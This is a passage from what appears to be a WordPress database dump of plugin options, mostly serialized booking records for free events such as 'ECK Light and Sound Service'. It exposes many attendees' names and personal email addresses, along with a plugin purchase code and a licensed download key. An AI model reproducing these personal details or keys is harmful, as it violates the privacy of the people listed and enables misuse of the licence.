Gogh\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1686479400:1686483000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1686479400;s:20:\"ticket_timestamp_end\";i:1686526200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7394512,'DKV30060','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1684060200:1684063800\";s:8:\"event_id\";s:6:\"268417\";s:19:\"translated_event_id\";s:6:\"268417\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268467;s:11:\"invoice_key\";s:32:\"1cf47948a839272f17ff520a360c2862\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7394108,'AUX15539','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1684060200:1684063800\";s:8:\"event_id\";s:6:\"268417\";s:19:\"translated_event_id\";s:6:\"268417\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268465;s:11:\"invoice_key\";s:32:\"1a6b5ae5a2b9a89265ebaa416a0dd2ea\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7387189,'SJA73724','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:16:\"amhynes7@msn.com\";s:4:\"name\";s:13:\"Agnes R Hynes\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1683455400:1683502200\";s:8:\"event_id\";s:6:\"268430\";s:19:\"translated_event_id\";s:6:\"268430\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268459;s:11:\"invoice_key\";s:32:\"47faaa1ee4ed53236debf4f786f9f512\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:16:\"amhynes7@msn.com\";s:4:\"name\";s:13:\"Agnes R Hynes\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7395184,'EPX33602','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:15:\"Beth massengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1684060200:1684063800\";s:8:\"event_id\";s:6:\"268417\";s:19:\"translated_event_id\";s:6:\"268417\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268471;s:11:\"invoice_key\";s:32:\"bfb6ae78a1cb3f2b8629f4ce698ccd34\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:15:\"Beth massengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7395203,'JXG14538','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1684060200:1684063800\";s:8:\"event_id\";s:6:\"268417\";s:19:\"translated_event_id\";s:6:\"268417\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268472;s:11:\"invoice_key\";s:32:\"150536f467204cd05ca5551216a6c6ea\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7395044,'PYX90518','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1684060200:1684063800\";s:8:\"event_id\";s:6:\"268417\";s:19:\"translated_event_id\";s:6:\"268417\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268468;s:11:\"invoice_key\";s:32:\"bb1e73d8376b491a9da307fd1ea020d0\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7422016,'SUT85426','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"gvg1328@telus.net\";s:4:\"name\";s:15:\"Gerald van Gogh\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1686479400:1686483000\";s:8:\"event_id\";s:6:\"268482\";s:19:\"translated_event_id\";s:6:\"268482\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268601;s:11:\"invoice_key\";s:32:\"8aeb2be627444bab4fe135fdf8927ddb\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"gvg1328@telus.net\";s:4:\"name\";s:15:\"Gerald van Gogh\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7372064,'wp_mail_smtp_setup_wizard_stats','a:3:{s:13:\"launched_time\";i:1682102905;s:14:\"completed_time\";i:0;s:14:\"was_successful\";b:0;}','no'),(7371895,'pand-d41d8cd98f00b204e9800998ecf8427e','1694893396','no'),(7371877,'wpcode_usage_tracking_config','a:6:{s:3:\"day\";i:0;s:4:\"hour\";i:10;s:6:\"minute\";i:54;s:6:\"second\";i:37;s:6:\"offset\";i:39277;s:8:\"initsend\";i:1682247277;}','no'),(7438017,'DKV30060_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1684060200:1684063800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1684060200;s:20:\"ticket_timestamp_end\";i:1684107000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438018,'SNV66954_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"Paigeblake89@yahoo.com\";s:4:\"name\";s:11:\"Paige Blake\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1683455400:1683502200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1683455400;s:20:\"ticket_timestamp_end\";i:1683502200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438007,'VTM37468_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"agstreet11@gmail.com\";s:4:\"name\";s:13:\"A Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1686479400:1686483000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1686479400;s:20:\"ticket_timestamp_end\";i:1686526200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438008,'FDM78046_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"billybobvak@yahoo.com\";s:4:\"name\";s:16:\"Marc Maqssengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1686479400:1686483000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1686479400;s:20:\"ticket_timestamp_end\";i:1686526200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438009,'QGV17111_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"billybobak@yahoo.com\";s:4:\"name\";s:15:\"Marc massengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1686479400:1686483000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1686479400;s:20:\"ticket_timestamp_end\";i:1686526200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7473710,'mec-fllicense_status','active','yes'),(7473711,'mec-flreActivationOption','1','yes'),(7473714,'mec-liquidlicense_status','active','yes'),(7473715,'mec-liquidreActivationOption','1','yes'),(7490541,'EYV69962','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:27:\"marlenechapelle88@gmail.com\";s:4:\"name\";s:16:\"Marlene Chapelle\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268863\";s:19:\"translated_event_id\";s:6:\"268863\";s:4:\"date\";s:21:\"1691922600:1691926200\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1691922600:1691926200\";}s:10:\"booking_id\";i:268887;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"27c7d931bfc4843a4dabb519b138b13b\";}','no'),(7494371,'OFC52366','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268863\";s:19:\"translated_event_id\";s:6:\"268863\";s:4:\"date\";s:21:\"1691922600:1691926200\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1691922600:1691926200\";}s:10:\"booking_id\";i:268890;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"33e4e23465880d90663907f2b69f719b\";}','no'),(7413323,'YON92518','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"Antiasandsun@gmail.com\";s:4:\"name\";s:16:\"Anitha Nakakena \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1686479400:1686483000\";s:8:\"event_id\";s:6:\"268482\";s:19:\"translated_event_id\";s:6:\"268482\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268572;s:11:\"invoice_key\";s:32:\"838299c8c2e059d9f6b8fc31947646b8\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"Antiasandsun@gmail.com\";s:4:\"name\";s:16:\"Anitha Nakakena \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7409465,'wp-optimize-dismiss_season','1716831212','yes'),(7438011,'UFH29900_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1684060200:1684063800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1684060200;s:20:\"ticket_timestamp_end\";i:1684107000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7434770,'external_updates-mec-liquid-layouts','O:8:\"stdClass\":5:{s:9:\"lastCheck\";i:1700584707;s:14:\"checkedVersion\";s:5:\"1.2.0\";s:6:\"update\";O:8:\"stdClass\":11:{s:4:\"slug\";s:18:\"mec-liquid-layouts\";s:7:\"version\";s:5:\"1.2.0\";s:12:\"download_url\";s:84:\"https://api.webnus.site/v3/updates/download.php?key=9dc654781cdf4a235aa373cdfb7c381b\";s:12:\"translations\";a:0:{}s:2:\"id\";i:0;s:8:\"homepage\";s:42:\"https://webnus.net/modern-events-calendar/\";s:6:\"tested\";s:7:\"6.3.999\";s:12:\"requires_php\";s:5:\"5.6.0\";s:14:\"upgrade_notice\";N;s:5:\"icons\";a:1:{s:3:\"svg\";s:79:\"https://api.webnus.site/v3/updates/package-assets/icons/liquid-view-layouts.svg\";}s:8:\"filename\";s:41:\"mec-liquid-layouts/mec-liquid-layouts.php\";}s:11:\"updateClass\";s:23:\"Puc_v4p11_Plugin_Update\";s:15:\"updateBaseClass\";s:13:\"Plugin_Update\";}','no'),(7438006,'DOZ50327_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1686479400:1686483000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1686479400;s:20:\"ticket_timestamp_end\";i:1686526200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7434769,'mec_liquid_options','a:3:{s:12:\"product_name\";s:20:\"	Liquid-view Layouts\";s:13:\"purchase_code\";s:32:\"26b33e27efa03568f9ebfa5dc27c5a2a\";s:10:\"product_id\";s:8:\"34437589\";}','yes'),(7438004,'AYS54080_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1686479400:1686483000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1686479400;s:20:\"ticket_timestamp_end\";i:1686526200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438005,'ZMK94087_cached','a:1:{i:0;a:24:{s:5:\"email\";s:25:\"allanborenstein@yahoo.com\";s:4:\"name\";s:7:\"Allan B\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1686479400:1686483000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1686479400;s:20:\"ticket_timestamp_end\";i:1686526200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7445104,'mec_cart_697424309','a:0:{}','no'),(7529588,'mec_cart_334157510','a:0:{}','no'),(7445117,'mec_cart_156755700','a:0:{}','no'),(7438002,'JUR56597_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1686479400:1686483000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1686479400;s:20:\"ticket_timestamp_end\";i:1686526200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438024,'HVO20373_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1681036200:1681039800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1681036200;s:20:\"ticket_timestamp_end\";i:1681083000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438025,'FEZ57564_cached','a:1:{i:0;a:24:{s:5:\"email\";s:23:\"c.lotusheart@icloud.com\";s:4:\"name\";s:11:\"Cindy Mason\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound 